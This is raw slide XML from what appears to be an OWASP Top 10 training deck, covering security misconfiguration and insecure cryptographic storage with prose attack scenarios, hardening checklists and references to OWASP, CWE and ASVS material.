                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Recovery costs could be expensive.</a:t>
                      </a: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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Your application relies on a powerful framework like Struts or Spring. XSS flaws are found in these framework components you rely on. An update is released to fix these flaws but you don’t update your libraries. Until you do, attackers can easily find and exploit these flaws in your app.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she reverses to get all your custom code. She then finds a serious access control flaw in your application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.</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Have you performed the proper security hardening across the entire application stack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do you have a process for keeping all your software up to date? This includes the OS, Web/App Server, DBMS, applications, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all code libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is everything unnecessary disabled, removed, or not installed (e.g. ports, services, pages, accounts, privileges)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are default account passwords changed or disabled?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is your error handling set up to prevent stack traces and other overly informative error messages from leaking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are the security settings in your development frameworks (e.g., Struts, Spring, ASP.NET) and libraries understood and configured properly?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A concerted, repeatable process is required to develop and maintain a proper application security configuration.</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Development Guide: Chapter on Configuration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Code Review Guide: Chapter on Error Handling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Testing Guide: Configuration Management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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes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Top 10 2004 - Insecure Configuration Management </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional requirements in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS requirements area for Security Configuration (V12)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</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PC Magazine Article on Web Server Hardening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2 on Environmental Security Flaws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CIS Security Configuration Guides/Benchmarks</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The primary recommendations are to establish all of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically. This process should be automated to minimize the effort required to setup a new secure environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This needs to include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all code libraries as well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, which are frequently overlooked.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A strong application architecture that provides good separation and security between components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider running scans and doing audits periodically to help detect future </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>misconfigurations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or missing patches.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A6</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48520"/>
          <a:ext cx="6858000" cy="253345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770">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74845">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85650">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the users of your system. Would they like to gain access to protected data they aren’t authorized for? What about internal administrators?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Attackers typically don’t break the crypto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. They break something else, such as find keys, get </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>cleartext</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> copies of data, or access data via channels that automatically decrypt.</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rPr>
                        <a:t>The most common flaw</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys, and weak algorithm usage is common. Use of weak or unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access. They usually must exploit something else first to gain the needed access.</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Failure frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> compromises all data that should have been encrypted. Typically this information includes  sensitive data such as health records, credentials, personal data, credit cards, etc.</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lost data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and impact to your reputation. What is your legal liability if this data is exposed? Also consider the damage to your reputation.</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An application encrypts credit cards in a database to prevent exposure to end users. However, the database is set to automatically decrypt queries against the credit card columns, allowing an SQL injection flaw to retrieve all the credit cards in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. The system should have been configured to allow only back end applications to decrypt them, not the front end web application.</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A backup tape is made of encrypted health records, but the encryption key is on the same backup. The tape never arrives at the backup center.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The password database uses unsalted hashes to store everyone’s passwords. A file upload flaw allows an attacker to retrieve the password file. All the unsalted hashes can be brute forced in 4 weeks, while properly salted hashes would have taken over 3000 years.</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first thing you have to determine is which data is sensitive enough to require encryption. For example, passwords, credit cards, health records, and personal information should be encrypted. For all such data, ensure:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It is encrypted everywhere it is stored long term, particularly in backups of this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Only authorized users can access decrypted copies of the data (i.e., access control – See A4 and A8).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A strong standard encryption algorithm is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A strong key is generated, protected from unauthorized access, and key change is planned for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And more … For a more complete set of problems to avoid, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS requirements on Cryptography (V7)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For a more complete set of requirements and problems to avoid in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS requirements on Cryptography (V7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>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Insecure Cryptographic Storage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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Encryptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> 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Development Guide: Chapter on Cryptography</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Code Review Guide: Chapter on Cryptography</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CWE Entry 310 on Cryptographic Issues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312 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Cleartext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> Storage of Sensitive Information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326 on Weak Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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The full perils of unsafe cryptography are well beyond the scope of this Top 10. That said, for all sensitive data deserving encryption, do all of the following, at a minimum:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all such data at rest in a manner that defends against these threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure offsite backups are encrypted, but the keys are managed and backed up separately.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure appropriate strong standard algorithms and strong keys are used, and key management is in place.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure passwords are hashed with a strong standard algorithm and an appropriate salt is used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure all keys and passwords are protected from unauthorized access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insecure Cryptographic</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Storage</a:t>
            </a:r>
